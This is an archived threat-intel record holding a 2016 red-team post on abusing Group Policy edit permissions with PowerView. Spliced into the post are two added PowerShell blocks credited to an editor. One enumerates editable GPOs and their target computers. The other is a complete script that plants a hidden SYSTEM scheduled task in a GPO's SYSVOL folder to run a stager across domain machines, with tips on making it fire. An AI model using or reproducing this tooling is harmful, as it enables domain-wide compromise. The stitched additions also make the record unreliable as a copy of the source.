{
	"id": "78e94ad0-bc8a-4321-9798-8c38e654cdc6",
	"created_at": "2026-04-06T00:19:34.111889Z",
	"updated_at": "2026-04-10T03:20:43.366432Z",
	"deleted_at": null,
	"sha1_hash": "69b0ca047d03f09082181dab17a899fb2dd605cb",
	"title": "Abusing GPO Permissions",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 650484,
	"plain_text": "Abusing GPO Permissions\r\nPublished: 2016-03-17 · Archived: 2026-04-05 15:16:49 UTC\r\nA friend (@piffd0s) recently ran into a specific situation I hadn’t encountered before: the domain controllers and domain admins of the environment he was assessing were extremely locked down, but he was able to determine that a few users had edit rights on a few specific group policy objects (GPOs). After a bit of back and forth, he was able to abuse this to take down his target, and we were able to integrate some new functionality into PowerView that facilitates this process.\r\nThis post will cover these new features and demonstrate how to enumerate and abuse misconfigured GPOs in case you encounter a similar situation. I also covered a bit of this material in my recent Troopers16 presentation “I Have the Power(View): Offensive Active Directory with PowerShell”. Sidenote: I can’t say enough good things about Troopers; if you haven’t been I definitely recommend checking it out! Also, this new functionality is in the development branch of PowerSploit and should be merged into master soon(ish).\r\nGPO Background\r\nGroup Policy Objects are Active Directory containers used to store groupings of policy settings. These objects are then linked to specific sites, domains, or most commonly specific organizational units (OUs). According to Microsoft, “By default, computer Group Policy is updated in the background every 90 minutes, with a random offset of 0 to 30 minutes.”, which forces the application of specific settings to any machines in an OU/site where the GPO is linked. Sean Metcalf also just posted a great article explaining GPOs from an offensive perspective, which I highly recommend reading.\r\nWith PowerView, the Get-NetGPO cmdlet allows for the easy enumeration of all current GPOs in a given domain. 
We can also easily figure out what OUs a policy is applied to by searching for the GPO GUID in the gPLink attribute of any OU objects (this also works with Get-NetSite). We can then track this back to specific computers, as the “GPP and PowerView” post demonstrated. If we want to go the opposite direction and determine what GPOs a specific computer has applied, we can feed Get-NetGPO the -ComputerName COMPUTER argument, and all GPOs for the target system (applied by OU or site) will be returned:\r\nhttps://blog.harmj0y.net/redteaming/abusing-gpo-permissions/\r\nPage 1 of 5\r\nThe gpcfilesyspath field shows you where the configuration for the policy resides. All of this will matter shortly: the key here is to be able to quickly find the GPOs that apply to specific machines (starting from either the GPO name or the machine name) and where the actual GPO configuration files reside.\r\nEnumerating GPO Permissions\r\nI covered some similar information in my “Abusing Active Directory Permissions with PowerView” post, but I’ll reiterate a bit here. Active Directory objects (like files) have permissions associated with them. These can sometimes be misconfigured, and can also be backdoored for persistence (as shown in the abuse post). This includes GPOs. The key PowerView function we can use here for enumeration is Get-ObjectAcl.\r\nLet’s enumerate all the permissions for all GPOs in the current domain:\r\nGet-NetGPO | %{Get-ObjectAcl -ResolveGUIDs -Name $_.Name}\r\nNote: you can also use PowerView’s Invoke-ACLScanner to speed up your search. This will search the ACLs for ALL domain objects, and returns results where the IdentityReference RID is 1000 or above (i.e. a principal that is not one of the default accounts or groups) and also has some type of modification rights on the given object.\r\nEither way, you will get a big chunk of data, with most of the entries likely being groups like Enterprise and Domain Admins. 
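The following is an added example written for this edited page (editor's code, not code from the original post or from PowerView itself) that joins the two steps above: it filters the Get-ObjectAcl output down to non-default principals holding write rights on a GPO, then follows each hit through gPLink to the linked OUs and the computers under them. It assumes PowerView's 2016 development branch is imported, that Get-NetGPO objects expose the name (GUID), displayname and gpcfilesyspath properties shown in the post, that Convert-NameToSid resolves an IdentityReference such as TESTLAB\\will to its SID (returning nothing on failure), and that Get-NetOU -GUID returns the ADS paths of OUs whose gPLink contains the GPO GUID.

```powershell
# Added example for this page (editor's code, not PowerView's own). Assumes PowerView's
# 2016 development branch is already imported: Get-NetGPO, Get-ObjectAcl, Convert-NameToSid,
# Get-NetOU -GUID and Get-NetComputer -ADSpath with the parameters used below.

# Rights that let a principal change a GPO's settings or take over the object outright.
$WriteRights = 'GenericAll|GenericWrite|WriteProperty|WriteDacl|WriteOwner'

# Default principals have RIDs below 1000 (Domain Admins = 512, Enterprise Admins = 519);
# anything at or above 1000 was created by the admins and is worth a second look.
function Test-NonDefaultPrincipal {
    param([string]$Name)   # an IdentityReference such as 'TESTLAB\\will'
    if ($Name -match '^(NT AUTHORITY|BUILTIN|NT SERVICE)') { return $false }
    $Sid = Convert-NameToSid -ObjectName $Name   # PowerView helper; assumed to return nothing on failure
    if (-not $Sid) { return $false }
    return ([int](($Sid -split '-')[-1]) -ge 1000)
}

# Emits one object per (GPO, principal) pair where a non-default principal can edit the
# GPO, together with the OUs the policy is linked to and the computers under them.
function Find-EditableGPO {
    Get-NetGPO | ForEach-Object {
        $GPO = $_
        Get-ObjectAcl -ResolveGUIDs -Name $GPO.name |
            Where-Object { $_.ActiveDirectoryRights -match $WriteRights } |
            Where-Object { Test-NonDefaultPrincipal $_.IdentityReference } |
            ForEach-Object {
                # Get-NetOU -GUID searches gPLink for the GPO GUID and returns OU ADS paths;
                # Get-NetComputer -ADSpath then lists the machines under each OU.
                $OUs = @(Get-NetOU -GUID $GPO.name)
                $Computers = @($OUs | ForEach-Object { Get-NetComputer -ADSpath $_ })
                New-Object PSObject -Property @{
                    GPODisplayName = $GPO.displayname
                    GPOName        = $GPO.name
                    GPCFileSysPath = $GPO.gpcfilesyspath
                    Principal      = $_.IdentityReference
                    Rights         = $_.ActiveDirectoryRights
                    LinkedOUs      = $OUs
                    Computers      = $Computers
                }
            }
    }
}

Find-EditableGPO | Format-List
```

One caveat on the LinkedOUs column: gPLink stores link flags after each GUID (a disabled link is ;1, an enforced one ;2), and a substring match on the GUID returns OUs with disabled links too. Treat the OU list as candidates and confirm with Get-NetGPO -ComputerName on a machine you care about before relying on it.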
Here’s what a misconfiguration might look like:\r\nAnd here’s how that misconfiguration looks through the Group Policy Management console:\r\nSo the ‘TESTLAB\\will’ user has modification rights on the GPO with the GUID of “{3EE4BE4E-7397-4433-A9F1-3A5AE2F56EA2}” and display name of “SecurePolicy”. Let’s track this back and see what systems this GPO is applied to:\r\nSo now we know the specific policy our user can edit and the machines this policy is applied to. And with edit rights to the GPO, we can force code execution on these machines!\r\nWeaponizing GPO Edit Rights\r\nGroup Policy has a huge number of settings to manipulate, giving you a few ways to go about compromising machines/users touched by a compromised GPO. You could push out specific startup scripts, backdoor Internet Explorer settings, push out a .MSI under ‘Software installation’, add your domain account to the local administrators/RDP group, force the mounting of a network share (where you control the endpoint and can relay any specific credentials), or several other approaches I’m sure I’m not realizing.\r\nMy preference for immediate code execution would be to push out an ‘Immediate’ Scheduled task, which instantly runs and then removes itself, every time group policy refreshes. This part is pretty simple: we just need to build a schtask .XML template to substitute in our appropriate configuration/commands and then copy it to \u003cGPO_PATH\u003e\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml of the GPO we can edit. After waiting 1-2 hours for the group policy refresh cycle, we can remove the .xml to minimize our footprint.\r\nPowerView’s new New-GPOImmediateTask function should take care of all this for you. 
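Before going through its parameters, here is the manual version of that procedure as an added example (editor's code, not from the original post or from PowerView): render the ScheduledTasks.xml for an ‘Immediate’ task, drop it into the GPO's SYSVOL folder, and remove it afterwards. It assumes you already hold edit rights on the GPO, that the gpcfilesyspath value from Get-NetGPO is a writable UNC path into SYSVOL, and that the ImmediateTaskV2 element layout and clsid values below match what the Group Policy Preferences client expects; the stager arguments in the usage lines are a placeholder, not a real payload.

```powershell
# Added example for this page (editor's code, not the post's or PowerView's). Reproduces by
# hand the steps the post describes: render an ImmediateTaskV2 preference, copy it into the
# GPO's SYSVOL folder, wait for the refresh cycle, then delete it again.
# Assumptions: edit rights on the GPO, $GpcFileSysPath = Get-NetGPO's gpcfilesyspath (a UNC
# path into SYSVOL), and the ImmediateTaskV2 layout below matches the Preferences schema.

function New-ImmediateTaskXml {
    param(
        [Parameter(Mandatory=$true)][string]$TaskName,
        [string]$Command = 'powershell.exe',
        [string]$Arguments = '',
        [string]$Author = 'NT AUTHORITY\\System',
        [string]$Description = ''
    )
    # Arguments and description land inside XML text nodes: quotes, & and < must be escaped
    # or the preference client rejects the whole file and nothing runs.
    $SafeArgs = [System.Security.SecurityElement]::Escape($Arguments)
    $SafeDesc = [System.Security.SecurityElement]::Escape($Description)
    $Uid      = '{' + [guid]::NewGuid().ToString().ToUpper() + '}'
    $Changed  = (Get-Date).ToString('yyyy-MM-dd HH:mm:ss')
@\"
<?xml version=\"1.0\" encoding=\"utf-8\"?>
<ScheduledTasks clsid=\"{CC63F200-7309-4ba0-B154-A71CD118DBCC}\">
  <ImmediateTaskV2 clsid=\"{9756B581-76EC-4169-9AFC-0CA8D43ADB5F}\" name=\"$TaskName\" image=\"0\" changed=\"$Changed\" uid=\"$Uid\">
    <Properties action=\"C\" name=\"$TaskName\" runAs=\"NT AUTHORITY\\System\" logonType=\"S4U\">
      <Task version=\"1.3\">
        <RegistrationInfo><Author>$Author</Author><Description>$SafeDesc</Description></RegistrationInfo>
        <Principals>
          <Principal id=\"Author\"><UserId>NT AUTHORITY\\System</UserId><RunLevel>HighestAvailable</RunLevel><LogonType>S4U</LogonType></Principal>
        </Principals>
        <Settings>
          <AllowStartOnDemand>true</AllowStartOnDemand>
          <StartWhenAvailable>true</StartWhenAvailable>
          <Enabled>true</Enabled>
          <Hidden>true</Hidden>
          <ExecutionTimeLimit>PT1H</ExecutionTimeLimit>
          <DeleteExpiredTaskAfter>PT0S</DeleteExpiredTaskAfter>
        </Settings>
        <Actions Context=\"Author\">
          <Exec><Command>$Command</Command><Arguments>$SafeArgs</Arguments></Exec>
        </Actions>
        <Triggers>
          <TimeTrigger>
            <StartBoundary>%LocalTimeXmlEx%</StartBoundary>
            <EndBoundary>%LocalTimeXmlEx%</EndBoundary>
            <Enabled>true</Enabled>
          </TimeTrigger>
        </Triggers>
      </Task>
    </Properties>
  </ImmediateTaskV2>
</ScheduledTasks>
\"@
}

function Push-ImmediateTask {
    param(
        [Parameter(Mandatory=$true)][string]$GpcFileSysPath,   # gpcfilesyspath from Get-NetGPO
        [Parameter(Mandatory=$true)][string]$TaskName,
        [string]$CommandArguments = ''
    )
    $Dir  = Join-Path $GpcFileSysPath 'Machine\\Preferences\\ScheduledTasks'
    $File = Join-Path $Dir 'ScheduledTasks.xml'
    if (Test-Path $File) {
        # An existing file means the admins deployed tasks here; merging is out of scope,
        # and overwriting it would break their policy and draw attention.
        throw ($File + ' already exists; refusing to overwrite it')
    }
    if (-not (Test-Path $Dir)) { New-Item -ItemType Directory -Path $Dir | Out-Null }
    New-ImmediateTaskXml -TaskName $TaskName -Arguments $CommandArguments |
        Out-File -FilePath $File -Encoding utf8
    return $File
}

function Remove-ImmediateTask {
    param([Parameter(Mandatory=$true)][string]$GpcFileSysPath)
    $File = Join-Path $GpcFileSysPath 'Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml'
    if (Test-Path $File) { Remove-Item -Path $File -Force }
}

# Usage with the GPO from the post; the stager arguments are a placeholder, not a real payload.
$Gpo = Get-NetGPO -DisplayName 'SecurePolicy'
Push-ImmediateTask -GpcFileSysPath $Gpo.gpcfilesyspath -TaskName 'Debugging' -CommandArguments '-NoP -NonI -W Hidden -Enc <base64 stager>'
# ...after the 1-2 hour refresh window has passed and the task has fired:
Remove-ImmediateTask -GpcFileSysPath $Gpo.gpcfilesyspath
```

Two things decide whether the task ever fires, and the XML copy on its own covers neither: the Group Policy client skips a GPO whose version has not changed since the last refresh (the versionNumber attribute on the GPO object, mirrored in the Version= line of GPT.ini in the GPO's SYSVOL folder), and it only invokes the Scheduled Tasks preference extension if that extension's GUID, {AADCED64-746C-4633-A97C-D61349046527}, is listed in the GPO's gPCMachineExtensionNames attribute. If a pushed task never runs, check both of those before suspecting the XML.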
The -TaskName argument is required, -Command specifies the command to run (which defaults to powershell.exe), and -CommandArguments specifies the arguments for the given binary. The task description, author, and modification date can also optionally be modified with the appropriate parameters. A schtask .xml is built according to your specifications and is copied to the appropriate location determined by the -GPOname or -GPODisplayname arguments. By default the function will prompt you before copying, but this can be suppressed with -Force.\r\nFor example, let’s use New-GPOImmediateTask to push an Empire stager out to machines where this ‘{3EE4BE4E-7397-4433-A9F1-3A5AE2F56EA2}’ GPO (display name of ‘SecurePolicy’) is applied:\r\nNew-GPOImmediateTask -TaskName Debugging -GPODisplayName SecurePolicy -CommandArguments '-NoP -NonI -\r\nYou can remove the schtask .xml after you get execution by supplying the -Remove flag:\r\nNew-GPOImmediateTask -Remove -Force -GPODisplayName SecurePolicy\r\nHave fun!\r\nSource: https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://blog.harmj0y.net/redteaming/abusing-gpo-permissions/"
	],
	"report_names": [
		"abusing-gpo-permissions"
	],
	"threat_actors": [],
	"ts_created_at": 1775434774,
	"ts_updated_at": 1775791243,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/69b0ca047d03f09082181dab17a899fb2dd605cb.pdf",
		"text": "https://archive.orkl.eu/69b0ca047d03f09082181dab17a899fb2dd605cb.txt",
		"img": "https://archive.orkl.eu/69b0ca047d03f09082181dab17a899fb2dd605cb.jpg"
	}
}